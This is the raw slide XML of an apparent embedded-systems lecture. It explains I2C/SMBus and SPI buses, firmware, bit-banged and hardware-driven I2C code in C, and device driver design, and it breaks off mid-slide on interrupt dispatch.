              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>But there are many devices (off-the-shelf) devices that communicate using other buses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>In those cases there will be a “bus master” or “bus controller” device that is responsible for the communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The bus master is connected to the CPU through the memory bus or IO bus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36185500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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SMBus</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i="1" dirty="0" smtClean="0"/>
              <a:t>Inter-Integrated Connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>System Management Bus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Popular buses to connect simple devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Serial memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Real time clocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simple sensors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bus physical attributes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Two lines: SCK (serial clock) and SDA (serial data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One bus master, multiple slaves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Master controls the clock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In most cases the microcontroller is the master</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multiple masters is also supported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>100Khz – 3.4Mhz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each device has a 7-bit address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20143446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33400"/>
            <a:ext cx="5138738"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95600"/>
            <a:ext cx="5334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58256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09600"/>
            <a:ext cx="64833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352800"/>
            <a:ext cx="69421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502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rtl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Soft &lt; Firm &lt; Hard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1905000"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Firmware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(FW) – embedded system software </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Somewhere between software and hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typically in C language, some bits of processor assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Embedded systems today start to experiment with C++, in rare cases Java</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21532131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0"/>
            <a:ext cx="72278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38400"/>
            <a:ext cx="72390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7239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19171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06463" y="1981200"/>
          <a:ext cx="7327900" cy="4114800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s14373"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28911098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I2C controller interface – </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>option 1: Bit Banging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400878" y="1600200"/>
            <a:ext cx="8229600" cy="1295400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Controller exposes direct interface to SCK and SDA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>FW is responsible for implementing the protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="2895600"/>
            <a:ext cx="3733800" cy="378618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SendByte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (uint8</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data)</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uint8</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mask;</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (mask = 0x80; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        mask != 0; mask &gt;&gt;=1)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(data &amp; mask)</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(1, I2C_DATA);</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else</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(0, I2C_DATA);</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(1, I2C_CLOCK);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      // delay</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(0, I2C_CLOCK);</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12293" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="3048000"/>
            <a:ext cx="4495800" cy="3046413"/>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ReadByte ()</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bit;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   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data = 0;</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (bit = 7; bit!= 0; --bit)</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data |= _lr(I2C_DATA) &lt;&lt; bit;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      _sr (1, I2C_CLOCK);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      // delay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      _sr (0, I2C_CLOCK);</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58289856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I2C controller interface – </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>option 2: HW does it all</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="1676400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The controller implements the protocol in hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The firmware needs only to program the data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="3733800"/>
            <a:ext cx="8382000" cy="2862263"/>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SendMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (uint8*</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data, uint8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, uint8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>len</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((uint32)data, AUX_I2C_DATA);</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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, AUX_I2C_ADDR);</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len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, AUX_I2C_LEN);</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(I2C_WRITE_CMD, AUX_I2C_CMD);</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(1, AUX_I2C_CTRL);</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(AUX_I2C_DONE))</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7660385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Serial Peripheral Interface (SPI)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="1447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3+N lines, where N is the number of slaves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Full Duplex”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No addressing, no acknowledgement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Up to 70 MHz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1434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0"/>
            <a:ext cx="6223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13767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en-US" dirty="0" smtClean="0"/>
              <a:t>Device Drivers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110595" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" smtClean="0"/>
              <a:t>device driver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t> is the software component that interacts with the device hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>General purpose computer / OS – device driver design is enforced by architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Only a device driver can interact with the hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Sometimes the device driver has to conform to a specific interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Embedded – no enforcements, just good design practice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" i="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330969740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en-US" smtClean="0"/>
              <a:t>Device Drivers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111619" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="3810000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Device driver design goal – hardware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" smtClean="0"/>
              <a:t>abstraction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>In practice: complete abstraction is hard to achieve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Clean design is sometimes traded off for optimizations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Importance of device driver design:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Hardware state can be tracked since it is located in one place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Software changes that are required by hardware changes are localized to a single component</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Helps the understanding of the firmware design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352317955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US" smtClean="0"/>
              <a:t>Device Driver Tasks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112643" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>“Low level” access to the device CSRs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tracking the state of the device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Device initialization – bring device to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>well-known state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Device driver API to callers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Interrupt management and interrupt service routines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194089338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Dispatching Interrupts From Driver to Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sometimes the driver needs to notify the application layer that an event occurred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The driver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> call into the application or assume extern variables to communicate with the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Instead, use one of the following constructs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
